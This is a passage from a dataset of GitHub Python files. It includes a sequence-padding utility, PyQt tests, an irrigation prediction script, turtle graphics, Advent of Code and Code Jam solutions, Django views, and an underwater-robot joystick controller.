numpy.ndarray\n PyTorch tensor or NumPy array version of the dataframe, after being\n padded with the specified padding value to have a fixed sequence\n length.\n '''\n if not inplace:\n # Make a copy of the data to avoid potentially unwanted changes to the original dataframe\n data_df = df.copy()\n else:\n # Use the original dataframe\n data_df = df\n if seq_len_dict is None:\n # Find the sequence lengths and store them in a dictionary\n seq_len_dict = get_sequence_length_dict(data_df, id_column, ts_column)\n # Fetch the number of unique sequence IDs\n n_ids = data_df[id_column].nunique()\n if isinstance(df, dd.DataFrame):\n # Make sure that the number of unique values are computed, in case we're using Dask\n n_ids = n_ids.compute()\n # Get the number of columns in the dataframe\n n_inputs = len(data_df.columns)\n if total_length is None:\n # Max sequence length in the current data\n total_length = seq_len_dict[max(seq_len_dict, key=seq_len_dict.get)]\n if n_ids > 1:\n # Making a padded numpy array version of the dataframe (all index has the same sequence length as the one with the max)\n arr = np.ones((n_ids, total_length, n_inputs)) * padding_value\n # Fetch a list with all the unique identifiers (e.g. each patient in the dataset)\n unique_ids = data_df[id_column].unique()\n # Iterator that outputs each unique identifier\n id_iter = iter(unique_ids)\n # Count the iterations of ids\n count = 0\n # Assign each value from the dataframe to the numpy array\n for idt in id_iter:\n arr[count, :seq_len_dict[idt], :] = data_df[data_df[id_column] == idt].to_numpy()\n arr[count, seq_len_dict[idt]:, :] = padding_value\n count += 1\n else:\n # Making a padded numpy array version of the dataframe (all index has the same sequence length as the one with the max)\n arr = np.ones((total_length, n_inputs)) * padding_value\n # Assign each value from the dataframe to the numpy array\n idt = data_df[id_column].iloc[0]\n arr[:seq_len_dict[idt], :] = data_df.to_numpy()\n arr[seq_len_dict[idt]:, :] = padding_value\n if bool_feat is None:\n # Find the boolean columns in the dataframe\n bool_feat = search_explore.list_boolean_columns(data_df)\n # Make sure that none of the ID columns are considered boolean\n bool_feat = list(set(bool_feat) - set([id_column, ts_column, label_column]))\n # Get the indices of the boolean features\n bool_feat = [search_explore.find_col_idx(data_df, feature) for feature in bool_feat]\n elif isinstance(bool_feat, str):\n # Get the index of the boolean feature\n bool_feat = search_explore.find_col_idx(data_df, bool_feat)\n # Make sure that the boolean feature names are in a list format\n bool_feat = [bool_feat]\n elif not isinstance(bool_feat, list):\n raise Exception(f'ERROR: The `bool_feat` argument must be specified as either a single string or a list of strings. Received input with type {type(bool_feat)}.')\n elif all(isinstance(feat, str) for feat in bool_feat):\n # Convert from the feature's name to its index\n bool_feat = [search_explore.find_col_idx(data_df, feat) for feat in bool_feat]\n if len(bool_feat) > 0:\n if n_ids > 1:\n # Iterator that outputs each unique identifier\n id_iter = iter(unique_ids)\n # Count the iterations of ids\n count = 0\n # Replace each padding value in the boolean features with zero\n for idt in id_iter:\n arr[count, seq_len_dict[idt]:, bool_feat] = 0\n count += 1\n else:\n # Replace each padding value in the boolean features with zero\n idt = data_df[id_column].iloc[0]\n arr[seq_len_dict[idt]:, bool_feat] = 0\n # Make sure that the data type asked for is a string\n if not isinstance(data_type, str):\n raise Exception('ERROR: Please provide the desirable data type in a string format.')\n if data_type.lower() == 'numpy':\n return arr\n elif data_type.lower() == 'pytorch':\n return torch.from_numpy(arr)\n else:\n raise Exception('ERROR: Unavailable data type. Please choose either NumPy or PyTorch.')\n\n\ndef sort_by_seq_len(data, seq_len_dict, labels=None, id_column=0):\n '''Sort the data by sequence length in order to correctly apply it to a\n PyTorch neural network.\n\n Parameters\n ----------\n data : torch.Tensor\n Data tensor on which sorting by sequence length will be applied.\n seq_len_dict : dict\n Dictionary containing the sequence lengths for each index of the\n original dataframe. This allows to ignore the padding done in\n the fixed sequence length tensor.\n labels : torch.Tensor, default None\n Labels corresponding to the data used, either specified in the input\n or all the data that the interpreter has.\n id_column : int, default 0\n Number of the column which corresponds to the subject identifier in\n the data tensor.\n\n Returns\n -------\n sorted_data : torch.Tensor, default None\n Data tensor already sorted by sequence length.\n sorted_labels : torch.Tensor, default None\n Labels tensor already sorted by sequence length. Only outputed if the\n labels data is specified in the input.\n x_lengths : list of int\n Sorted list of sequence lengths, relative to the input data.\n '''\n # Get the original lengths of the sequences, for the input data\n x_lengths = [seq_len_dict[id] for id in list(data[:, 0, id_column].numpy())]\n is_sorted = all(x_lengths[i] >= x_lengths[i+1] for i in range(len(x_lengths)-1))\n if is_sorted is True:\n # Do nothing if it's already sorted\n sorted_data = data\n sorted_labels = labels\n else:\n # Sorted indices to get the data sorted by sequence length\n data_sorted_idx = list(np.argsort(x_lengths)[::-1])\n # Sort the x_lengths array by descending sequence length\n x_lengths = [x_lengths[idx] for idx in data_sorted_idx]\n # Sort the data by descending sequence length\n sorted_data = data[data_sorted_idx, :, :]\n if labels is not None:\n # Sort the labels by descending sequence length\n sorted_labels = labels[data_sorted_idx, :]\n if labels is None:\n return sorted_data, x_lengths\n else:\n return sorted_data, sorted_labels, x_lengths\n\n\ndef pad_list(x_list, length, padding_value=999999):\n '''Pad a list with a specific padding value until the desired length is\n met.\n\n Parameters\n ----------\n x_list : list\n List which will be padded.\n length : int\n Desired length for the final padded list.\n padding_value : numeric\n Value to use in the padding, to fill the sequences.\n\n Returns\n -------\n x_list : list\n Resulting padded list'''\n return x_list + [padding_value] * (length - len(x_list))\n","repo_name":"AndreCNF/data-utils","sub_path":"data_utils/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":12057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42842996752","text":"import pandas as pd\nimport os\nimport pytest\nimport numpy as np\nimport pytest\nfrom app.gui.file_window import FileWindow\nfrom app.data.compute_statistics import getSummaryStatistics, getHistogramData\nfrom app.data.construct_metrics import Metrics\n\n@pytest.fixture\ndef file_window(qtbot):\n# Create a FileWindow instance for testing and show it\n file_window = FileWindow(None)\n file_window.show()\n# Test that the browseFile method opens the file dialog\n with qtbot.waitSignal(file_window.ui.pathToFileTextbox.textChanged):\n file_window.browseFile()\n assert file_window.filename != ''\n\n# Test that the loadFile method loads the file correctly\n file_window.loadFile()\n assert file_window.data is not None\n qtbot.addWidget(file_window)\n return file_window\n \n\ndef test_is_valid_file(qtbot, file_window, monkeypatch):\n # Test if the file is valid\n filename = \"CSV Files (*.csv)\"\n file_window.filename = filename\n def mock_return(*args, **kwargs):\n return True\n monkeypatch.setattr(os.path, \"isfile\", mock_return)\n \n\ndef test_invalid_file(qtbot, file_window, monkeypatch):\n # Test if the file is invalid\n filename = \"TXT Files (*.txt)\"\n file_window.filename = filename\n def mock_return(*args, **kwargs):\n return False\n monkeypatch.setattr(os.path, \"isfile\", mock_return)\n \n\n\n# Create some test data\ndata = pd.DataFrame({\n 'metric1': np.random.rand(100),\n 'metric2': np.random.rand(100),\n 'metric3': np.random.rand(100),\n})\n\ndef test_getSummaryStatistics():\n # Test that the function returns a DataFrame\n result = getSummaryStatistics(data)\n assert isinstance(result, pd.DataFrame)\n\n # Test that the DataFrame has the expected columns\n expected_columns = ['Median', '25th', 'Mean', '75th', 'Stdev', 'Min', 'Max']\n assert result.columns.tolist() == expected_columns\n\n # Test that the DataFrame has the expected index\n expected_index = data.columns.tolist()\n assert result.index.tolist() == expected_index\n\n\n\ndef test_getHistogramData():\n # Test that the function returns a Series\n metric = data.columns[0]\n result = getHistogramData(data, metric)\n assert isinstance(result, pd.Series)\n\n # Test that the Series has the expected length\n expected_length = len(data)\n assert len(result) == expected_length\n\n # Test that the values are numeric\n assert result.dtype == 'float64'\n\n# Fixture for Metrics object\n@pytest.fixture(scope='module')\ndef metrics_obj():\n # Load test data\n path_to_test_data = os.path.join(os.getcwd(), 'tests', 'F2020.csv')\n # Create a Metrics object\n return Metrics(path_to_test_data)\n\n# Test for constructMetricsTable method\ndef test_constructMetricsTable(metrics_obj):\n # Test the output of the method\n metrics_obj.constructMetricsTable()\n df = metrics_obj.get_datatable()\n assert 'lifespan' in df.columns\n assert 'A' in df.columns\n assert 'B' in df.columns\n assert 'C' in df.columns\n assert 'D' in df.columns\n assert 'E' in df.columns\n assert 'F' in df.columns\n assert 'G' in df.columns\n assert 'H' in df.columns\n assert 'I' in df.columns\n assert 'J' in df.columns\n assert 'K' in df.columns\n assert 'L' in df.columns\n assert 'M' in df.columns\n assert df.shape == (52, 15)\n","repo_name":"anguyen216/pyqt_UI","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40174083726","text":"import pandas\nimport sys\nimport datetime\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn import metrics\n\nfrom statsmodels.tsa.arima.model import ARIMA, ARIMAResultsWrapper\n\nfrom sqlalchemy import select\nfrom sqlalchemy.sql import func\n\nfrom models.irrigate import Irrigate\nfrom models.irrigate_predictions import IrrigatePredictions\n\nfrom utils.get_arguments import get_arguments\nfrom utils.get_session_engine import get_session_engine\nfrom constants.constants import MIN_SCORE_ESTIMATOR\n\narguments = get_arguments()\n\nengine, session = get_session_engine(\n user=arguments[\"--user\"], password=arguments[\"--password\"],\n host=arguments[\"--host\"], database=arguments[\"--database\"]\n)\n\nstmt = select(Irrigate).where(Irrigate.createdAt < func.now())\nirrigates = session.scalars(stmt).all()\n\ndataX = []\ndataY = []\n\nfor irrigate in irrigates:\n dataX.append(\n [\n irrigate.lengthMinutes,\n irrigate.createdAt.year,\n irrigate.createdAt.month,\n irrigate.createdAt.day,\n irrigate.FarmableLandId\n ]\n )\n dataY.append(\n irrigate.amountWater,\n )\n\nX = pandas.DataFrame(\n dataX,\n columns=[\n 'lengthMinutes', 'year', 'month', 'day', 'FarmableLandId'\n ]\n)\n\ny = pandas.Series(\n dataY\n)\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, random_state=42, test_size=0.20\n)\n\nmplregr = MLPRegressor(\n hidden_layer_sizes=[50, 20],\n learning_rate='adaptive',\n alpha=0.1,\n max_iter=3000,\n)\nneural_estimator = Pipeline(\n [\n ('std', StandardScaler()),\n ('mplregr', mplregr)\n ]\n)\nneural_estimator.fit(X_train, y_train)\nneural_estimator_score = neural_estimator.score(X_test, y_test)\n\ntime_series_arima = ARIMA(y_train)\ntime_series_arima_fit = time_series_arima.fit()\ntime_series_arima_predictions = time_series_arima_fit.predict(\n start=len(X_train),\n end=len(X_train) + len(X_test) - 1\n)\ntime_series_arima_score = metrics.r2_score(\n y_test,\n time_series_arima_predictions\n)\n\nprint(\n 'The R^2 Score of the Neural Network estimator is =>',\n neural_estimator_score\n)\n\nprint(\n 'The R^2 Score of the ARIMA estimator is =>',\n time_series_arima_score\n)\n\nneural_condition = neural_estimator_score < MIN_SCORE_ESTIMATOR\narima_condition = time_series_arima_score < MIN_SCORE_ESTIMATOR\nif neural_condition and arima_condition:\n sys.exit(\n \"The score of estimator is under \" +\n str(MIN_SCORE_ESTIMATOR) + \". Aborting!\"\n )\n\nestimators = [\n {'name': 'neural', 'pipeline_estimator': neural_estimator}\n]\n\nif time_series_arima_score > neural_estimator_score:\n estimators = [\n {'name': 'neural', 'pipeline_estimator': time_series_arima_fit}\n ]\n print('Using time series arima estimator...')\nelse:\n estimators = [\n {'name': 'neural', 'pipeline_estimator': neural_estimator}\n ]\n print('Using neural network estimator...')\n\ndays = int(arguments[\"--days\"])\n\nfor estimator in estimators:\n for day in range(1, days + 1):\n lengthMinutes = arguments[\"--lengthMinutes\"]\n farmableLandId = arguments[\"--farmId\"]\n\n today = datetime.date.today()\n targetDate = today + datetime.timedelta(days=day)\n\n predictX = pandas.DataFrame(\n [\n [\n lengthMinutes,\n targetDate.year,\n targetDate.month,\n targetDate.day,\n farmableLandId\n ]\n ],\n columns=[\n 'lengthMinutes', 'year', 'month', 'day', 'FarmableLandId'\n ]\n )\n\n try:\n prediction = [0]\n if isinstance(estimator['pipeline_estimator'], Pipeline):\n prediction = estimator['pipeline_estimator'].predict(\n predictX\n )\n elif isinstance(estimator['pipeline_estimator'], ARIMAResultsWrapper):\n prediction = estimator['pipeline_estimator'].predict(\n start=0,\n end=0\n )\n prediction = prediction.to_numpy()\n except:\n pass\n\n irrigatePrediction = IrrigatePredictions(\n date=targetDate,\n lengthMinutes=lengthMinutes,\n amountWater=round(prediction[0], 2),\n FarmableLandId=farmableLandId\n )\n\n stmtIrrigatePrediction = select(IrrigatePredictions).where(\n IrrigatePredictions.date == targetDate,\n IrrigatePredictions.FarmableLandId == farmableLandId\n )\n ip = session.scalars(stmtIrrigatePrediction).first()\n\n if not ip:\n session.add(irrigatePrediction)\n else:\n pass\n\nsession.flush()\nsession.commit()\n","repo_name":"guilogar/tfm","sub_path":"predictions/predictions_irrigate.py","file_name":"predictions_irrigate.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27224829917","text":"import turtle\n\n# Setup\nscreen = turtle.Screen()\nscreen.bgcolor(\"black\")\npen = turtle.Turtle()\npen.speed(0)\npen.pensize(2)\ncolors = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\n\n# Art\nfor _ in range(1000):\n pen.color(colors[_ % len(colors)])\n pen.forward(_)\n pen.right(59)\n\n# Hide the turtle\npen.hideturtle()\n\n# Exit on click\nturtle.done()\n","repo_name":"chimpastic/turtle","sub_path":"hexgon_23-05-2023.py","file_name":"hexgon_23-05-2023.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1198902248","text":"#!/usr/bin/env python3\n\"\"\"\nday6: part1.py - pretty clear when need a tree data structure to represent\n the data. Building a Node class with the parent (only one) and the\n children (possibly more than one).\n\n Also building a dictionary of all heavenly bodies so that I can locate\n one easily and then walk the path to COM via parent links/pointers or\n discover children via children array.\n\"\"\"\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.children = []\n self.parent = None\n\n def add(self, child):\n self.children.append(child)\n child.parent = self\n\n\ndef print_tree(bodies, top='COM', indent=''):\n root = bodies[top]\n print('{0}:{1}'.format(indent, top), len(root.children))\n i = 0\n for k in root.children:\n i = i + 1\n print_tree(bodies, top=k.value, indent=i)\n\n\ndef count_orbits(bodies):\n # Count the orbits\n orbits = 0\n\n for b in bodies:\n p = bodies[b].parent\n while(p is not None):\n orbits = orbits + 1\n p = p.parent\n\n return orbits\n\n\ndef build_bodies(entries):\n bodies = {}\n\n for entry in entries:\n body, moon = entry.rstrip().split(')')\n\n # We've not seen the parent body before\n if body not in bodies:\n b = Node(body)\n bodies[body] = b\n else:\n b = bodies[body]\n\n # We've not seen the moon before\n if moon not in bodies:\n m = Node(moon)\n bodies[moon] = m\n else:\n m = bodies[moon]\n\n b.add(m)\n\n return bodies\n\n\nif __name__ == '__main__':\n\n with open('part1.txt', 'r') as f:\n entries = f.readlines()\n\n bodies = build_bodies(entries)\n\n orbits = count_orbits(bodies)\n print('Total direct and indirect orbits: {0}'.format(orbits))\n","repo_name":"broadcaststorm/advent-of-code","sub_path":"2019/06/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36322840250","text":"from django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom catalogue.utils import CeceApiClient\nfrom catalogue.utils import CommandWrapper\nfrom catalogue.models import (\n Certificate,\n)\n\n\ndef create_or_update_certificates(logger, cmd_name, client, recursive=True):\n fn = \"create_or_update_certificates\"\n client.set_cece_token_headers(logger)\n\n # Retrieve the (paginated) data\n uri = settings.CECE_API_URI + \"mancelot/catalog/certificate/\"\n logger.debug(\"{0}: GET {1} <-- recursive = {2}\".format(fn, uri, recursive))\n data = client.get_list(logger, uri, recursive=recursive)\n logger.debug(\"{0}: received {1} certificates\".format(fn, len(data)))\n\n # Iterate through the Cece data\n for i, c in enumerate(data):\n logger.debug(\"\\n{0} / {1}\".format(i + 1, len(data)))\n\n # Get or create Certificate. Match on **name** only!\n certificate, created = Certificate.objects.get_or_create(\n name=c[\"name\"],\n )\n logger.debug(\n \"{0} Certificate: {1}\".format(\"Created\" if created else \"Have\", certificate)\n )\n\n # Overwrite all fields\n certificate.info = c[\"about\"]\n certificate.cece_api_url = \"{0}{1}/\".format(uri, c[\"id\"])\n certificate.save()\n\n\nclass Command(CommandWrapper):\n help = (\n \"\\033[91mUpdate Certificates with Cece data, overwriting all fields!\\033[0m\\n\"\n )\n\n def handle(self, *args, **options):\n client = CeceApiClient()\n self.cmd_name = __file__.split(\"/\")[-1].replace(\".py\", \"\")\n self.method = create_or_update_certificates\n self.margs = [self.cmd_name, client]\n self.mkwargs = {\"recursive\": not settings.DEBUG}\n\n super().handle(*args, **options)\n","repo_name":"tlrh314/mancelot","sub_path":"backend/apps/catalogue/management/commands/retrieve_certificates_from_cece.py","file_name":"retrieve_certificates_from_cece.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1571870748","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib import messages\r\nfrom django.contrib.messages import constants\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom .forms import MyUserCreationForm, MyUserLoginForm, MyUserUpdateForm\r\nfrom .decorators import login_forbidden\r\nfrom .models import User\r\nfrom chat.models import Topic\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.shortcuts import get_object_or_404\r\n\r\n\r\n@login_forbidden\r\ndef registerUser(request):\r\n form = MyUserCreationForm()\r\n if request.method == 'POST':\r\n form = MyUserCreationForm(request.POST)\r\n if form.is_valid():\r\n email = form.cleaned_data.get('email')\r\n if User.objects.filter(email=email).exists():\r\n messages.add_message(request, constants.ERROR, \"Email already registered\")\r\n\r\n user = form.save(commit=False)\r\n user.username = user.username.lower()\r\n user.backend = 'register.backends.EmailBackend'\r\n user.save()\r\n login(request, user)\r\n return redirect('home')\r\n\r\n return render(request, 'signup.html', context={'form': form, 'messages': messages.get_messages(request)})\r\n\r\n\r\n@login_forbidden\r\ndef loginUser(request):\r\n form = MyUserLoginForm()\r\n message = ''\r\n if request.method == 'POST':\r\n form = MyUserLoginForm(request.POST)\r\n if form.is_valid():\r\n user = authenticate(\r\n email = form.cleaned_data['email'],\r\n password = form.cleaned_data['password']\r\n )\r\n if user is not None:\r\n login(request, user)\r\n message = f'Hello {user.username}! You have been logged in!'\r\n return redirect('home')\r\n else:\r\n message = 'login failed!'\r\n return render(request, 'login.html', context={'form':form, 'message': message})\r\n\r\n\r\ndef logoutUser(request):\r\n logout(request)\r\n return redirect('login')\r\n\r\n@login_required\r\ndef userProfile(request, pk):\r\n user = User.objects.get(id=pk)\r\n rooms = user.room_set.all()\r\n room_messages = user.message_set.all()\r\n avatar_url = user.avatar if user.avatar else None\r\n topics = Topic.objects.all()\r\n context = {\r\n 'user': user, \r\n 'rooms':rooms, \r\n 'topics': topics,\r\n 'room_messages': room_messages,\r\n 'avatar_url': avatar_url,\r\n }\r\n return render(request, 'profile.html', context)\r\n\r\n\r\n@login_required\r\ndef updateUser(request, pk):\r\n user = request.user\r\n form = MyUserUpdateForm(instance=user)\r\n \r\n if request.method == 'POST':\r\n form = MyUserUpdateForm(request.POST, request.FILES, instance=user)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('user_profile', pk= user.id)\r\n return render(request, 'update_user.html', {'form':form})","repo_name":"caioedu1/FinWise","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543949581","text":"for t in range(int(input())):\n\tS, K = input().split()\n\tS = [x == '+' for x in S]\n\tK = int(K)\n\tr = 0\n\tfor i in range(len(S) - K + 1):\n\t\tif not S[i]:\n\t\t\tfor j in range(i, i + K):\n\t\t\t\tS[j] ^= True\n\t\t\tr += 1\n\tif not all(S[1-K:]):\n\t\tr = 'IMPOSSIBLE'\n\tprint(\"Case #{}: {}\".format(t + 1, r))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2608.py","file_name":"2608.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4029121192","text":"from tda_tabla_hash import crear_tabla, agregar_tc, hash_diccionario,buscar_tc, agregar_ta, buscar_ta\r\nfrom tda_lista import barrido\r\n\r\nclass Palabra(object):\r\n \r\n def __init__(self,palabra,significado):\r\n self.palabra = palabra\r\n self.significado = significado\r\n \r\n def __str__(self):\r\n \r\n return self.palabra.capitalize() + \". Significado : \" + self.significado.capitalize()\r\n\r\n# a b c d e f g h i j k l m n o p q r s t u v w x y z \r\n# 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26\r\n\r\npalabra1 = Palabra(\"a\",\"letra\")\r\npalabra2 = Palabra(\"b\",\"letra\")\r\npalabra3 = Palabra(\"aa\",\"letra\")\r\npalabra4 = Palabra(\"aaa\",\"letra\")\r\n\r\ndiccionario = crear_tabla(26)\r\ndiccionario2 = crear_tabla(26)\r\n'''\r\na = hash_diccionario(palabra1,diccionario)\r\nb = hash_diccionario(palabra2,diccionario)\r\nc = hash_diccionario(palabra3,diccionario)\r\nd = hash_diccionario(palabra4,diccionario)\r\n\r\nprint(a)\r\nprint(b)\r\nprint(c)\r\nprint(d)\r\n'''\r\nagregar_ta(diccionario2,hash_diccionario,palabra1,\"palabra\")\r\nagregar_ta(diccionario2,hash_diccionario,palabra2,\"palabra\")\r\nagregar_ta(diccionario2,hash_diccionario,palabra3,\"palabra\")\r\nagregar_ta(diccionario2,hash_diccionario,palabra4,\"palabra\")\r\n\r\n\r\ncont = 0 \r\nfor e in diccionario2:\r\n print(cont)\r\n if e:\r\n aux = e.inicio\r\n while aux:\r\n print(aux.info)\r\n aux = aux.sig\r\n cont += 1\r\n \r\nbuscado = buscar_ta(diccionario2,hash_diccionario,palabra1,\"palabra\")\r\nprint(buscado.info)\r\n\r\n\r\n\r\n","repo_name":"JuanInhale/Algoritmos-2020","sub_path":"hash_ej1.py","file_name":"hash_ej1.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74123414594","text":"if __name__ =='__main__':\n import sys\n sym=sys.ps1\n symbol=sys.ps2\n\n \"\"\"\n 1)The variable sys.path is a list of strings that \n determines the interpreter’s search path for modules;\n output_formatting_1)It is initialized to a default path taken from the environment \n variable PYTHONPATH, or from a built-in default if PYTHONPATH is not set;\n 3)You can modify it using standard list operations:\n \n \"\"\"\n # sys.path.append('D:\\\\Pycharm\\\\Workspace\\\\git_operation\\\\standard_module5.py')","repo_name":"HolyQuar/git_operation","sub_path":"python_operation/modules_operation_3/standard_modules5.py","file_name":"standard_modules5.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31833079676","text":"import turtle\n\n\nclass Mob(turtle.Turtle):\n _algorythm = 'greedy'\n\n def __init__(self, coord=(0, 0), name='Frog', img='frog.gif',\n speed=15):\n super().__init__()\n # scr = turtle.Screen()\n # scr.register_shape(shape='./frog.gif', name='frog')\n self.shape(name='turtle')\n self.penup()\n self.coord = list(coord)\n self.goto(coord)\n self.speed = speed\n self.name = name\n\n def move(self):\n self.goto(self.coord)\n\n def step(self, direction='up'):\n if direction == 'up':\n self.coord[1] += self.speed\n if direction == 'down':\n self.coord[1] -= self.speed\n if direction == 'left':\n self.coord[0] -= self.speed\n if direction == 'right':\n self.coord[0] += self.speed\n self.move()\n return self.coord\n\n def set_coord(self, coord):\n self.coord = list(coord)\n","repo_name":"kit8nino/2023-python","sub_path":"_4/mob.py","file_name":"mob.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"12498516372","text":"#!/usr/bin/env python3\n# Decription:\n# This program takes user input commands from the \n# external controller, and moves the ROSPerch as such.\n# Adapted Sources:\n# Motor command code is adapted from the UTAP 2020\n# code at https://github.com/jdicecco/UTAP/\n# Joystick control code is based on code released \n# by rdb under the Unlicense (unlicense.org)\n# Based on information from:\n# https://www.kernel.org/doc/Documentation/input/joystick-api.txt\n# License:\n# Software License Agreement (BSD License)\n# Find the full agreement at https://github.com/mxdrew/ROSPerch/blob/master/LICENSE\n\n# Imports the necessary libraries\nimport time\nimport math\nimport board\nimport busio\nimport adafruit_pca9685\nimport subprocess\nimport os, sys, struct, array\nfrom fcntl import ioctl\nimport RPi.GPIO as GPIO\n\n# I2C address for the PWM driver board retrieved automatically\ni2c_pwm = board.I2C()\npwm = adafruit_pca9685.PCA9685(i2c_pwm)\npwm.frequency = 1600\n\n#### CONFIGURE THE RPI TO INTERFACE WITH CONTROL BOARD ####\n\n# Make it easier to remember which pins control which motors\nGR1 = 19\nGR2 = 21\nBL1 = 13\nBL2 = 26\nOR1 = 20\nBR1 = 27\n\n\n# Do the same for the corresponding PWM signals\nGR1_PWM = 1\nGR2_PWM = 5\nBL1_PWM = 3\nBL2_PWM = 6\nOR1_PWM = 0\nBR1_PWM = 2\n\n\n# Use the numbering scheme for the Broadcom chip, not the RPi pin numbers\nGPIO.setmode(GPIO.BCM)\n\n# Turn off warnings about pins being already configured\nGPIO.setwarnings(False)\n\n\n# Setup pins to control direction on the motor driver chip (MAXIM's MAX14870)\nGPIO.setup(GR1,GPIO.OUT) # Green 1\nGPIO.setup(GR2,GPIO.OUT) # Green 2\nGPIO.setup(BL1,GPIO.OUT) # Blue 1\nGPIO.setup(BL2,GPIO.OUT) # Blue 2\nGPIO.setup(OR1,GPIO.OUT) # Orange 1\nGPIO.setup(BR1,GPIO.OUT) # Brown 1\n\n\n# Status LEDs\nGPIO.setup(6,GPIO.OUT)\nGPIO.setup(16,GPIO.OUT)\n\n\n# Based on code released by rdb under the Unlicense (unlicense.org)\n# Based on information from:\n# https://www.kernel.org/doc/Documentation/input/joystick-api.txt\n\n# Find the joystick device(s)\nprint('Available devices:')\n\n# Need to check to make sure a joystick has been connected before we proceed\n# if not, we'll just wait here until someone connects a joystick.\n\n# This is usually called a flag and is used to check a condition\n# when the desired condition is met, we change the value of the flag.\njoy_not_found = 1\n\nwhile joy_not_found:\n for fn in os.listdir('/dev/input'):\n if fn.startswith('js'):\n print(' /dev/input/%s' % (fn))\n joy_not_found = 0\n\n\n# We'll store the states of the axes and buttons\naxis_states = {}\nbutton_states = {}\n\n# These constants were borrowed and modified from linux/input.h\naxis_names = {\n 0x00 : 'x',\n 0x01 : 'y',\n 0x02 : 'rx',\n 0x03 : 'x2',\n 0x04 : 'y2',\n 0x05 : 'ry',\n 0x10 : 'hat0x',\n 0x11 : 'hat0y',\n}\n\nbutton_names = {\n 0x130 : 'a',\n 0x131 : 'b',\n 0x133 : 'x',\n 0x134 : 'y',\n 0x136 : 'LB',\n 0x137 : 'RB',\n 0x13a : 'select',\n 0x13b : 'start',\n 0x13c : 'mode',\n 0x13d : 'thumbl',\n 0x13e : 'thumbr',\n}\n\naxis_map = []\nbutton_map = []\n\n# Open the joystick device.\nfn = '/dev/input/js0'\nprint('Opening %s...' % fn)\njsdev = open(fn, 'rb')\n\n# Get the device name.\n#buf = bytearray(63)\nbuf = array.array('B', [0] * 64)\nioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)\njs_name = buf.tobytes().rstrip(b'\\x00').decode('utf-8')\nprint('Device name: %s' % js_name)\n\n# Get number of axes and buttons.\nbuf = array.array('B', [0])\nioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES\nnum_axes = buf[0]\n\nbuf = array.array('B', [0])\nioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS\nnum_buttons = buf[0]\n\n# Get the axis map.\nbuf = array.array('B', [0] * 0x40)\nioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP\n\nfor axis in buf[:num_axes]:\n axis_name = axis_names.get(axis, 'unknown(0x%02x)' % axis)\n axis_map.append(axis_name)\n axis_states[axis_name] = 0.0\n\n# Get the button map.\nbuf = array.array('H', [0] * 200)\nioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP\n\nfor btn in buf[:num_buttons]:\n btn_name = button_names.get(btn, 'unknown(0x%03x)' % btn)\n button_map.append(btn_name)\n button_states[btn_name] = 0\n\nprint(('%d axes found: %s' % (num_axes, ', '.join(axis_map))))\nprint(('%d buttons found: %s' % (num_buttons, ', '.join(button_map))))\n\n# Declare variables for use later\n# These will be the values from the right joystick\nintValx2 = 0\nintValy2 = 0\n\n# These will be the values from the left joystick\nintValx = 0\nintValy = 0\n\n# These will be the values from the two triggers in the front of the joystick\nintValrx = 0\nintValry = 0\n\n# A TRY-CATCH in programming allows a program to fail gracefully if the \"try\" portion\n# cannot be executed.\ntry:\n\n # Main event loop\n while True:\n\n # Joystick code based on release by rdb under the Unlicense (unlicense.org)\n # Based on information from:\n # https://www.kernel.org/doc/Documentation/input/joystick-api.txt\n\n evbuf = jsdev.read(8)\n if evbuf:\n tyme, value, type, number = struct.unpack('IhBB', evbuf)\n\n # Use for debugging\n #if type & 0x80:\n #print(\"(initial)\",end=\"\"),\n\n if type & 0x01:\n button = button_map[number]\n if button:\n button_states[button] = value\n # Use \"PRINT\" for debugging - comment out to speed program execution\n if value:\n print(\"%s pressed\" % (button))\n else:\n print(\"%s 